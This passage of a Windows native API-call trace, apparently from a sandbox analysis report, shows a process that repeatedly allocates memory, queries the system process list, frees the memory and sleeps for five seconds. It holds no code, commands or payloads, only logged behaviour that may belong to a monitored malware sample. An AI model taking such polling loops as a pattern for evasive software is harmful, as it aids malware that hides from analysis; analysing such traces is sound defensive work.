ResultLength=0x0) returned 0x0 [0237.875] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.876] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.878] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.878] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.879] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.879] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.880] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.884] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.885] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.887] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.887] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.888] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.888] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.889] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.893] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.894] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.896] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.896] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.897] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.898] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.898] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.902] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.903] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.905] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.905] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.906] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.906] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.907] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.911] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.912] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.913] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.914] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.914] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.915] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.915] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.919] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.920] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.922] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.922] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.923] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.923] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.923] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.927] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.928] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.930] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.931] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.931] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.932] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.932] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.938] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.939] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.943] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.943] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.944] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.944] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.944] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.948] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.949] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.951] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.951] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.952] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.952] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.953] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.957] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.958] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.959] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.959] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.960] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.961] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.961] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.965] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.966] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.967] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.967] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.968] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.969] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.969] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.974] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.975] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.977] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.977] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.978] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.978] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.978] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.983] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.984] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.986] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.986] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.987] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.988] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.988] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.993] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.994] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.996] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.996] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.997] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.997] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.998] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.002] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.003] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.011] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.012] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.013] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.013] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.013] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.018] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.019] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.021] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.021] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.022] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.023] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.023] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.027] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.055] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.057] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.057] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.058] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.059] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.059] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.064] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.065] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.067] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.067] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.068] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.068] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.068] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.072] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.073] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.074] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.075] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.075] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.076] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.076] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.079] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.080] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.082] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.082] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.082] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.083] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.083] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.086] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.087] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.088] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.089] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.089] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.089] NtAllocateVirtualMemory (in: 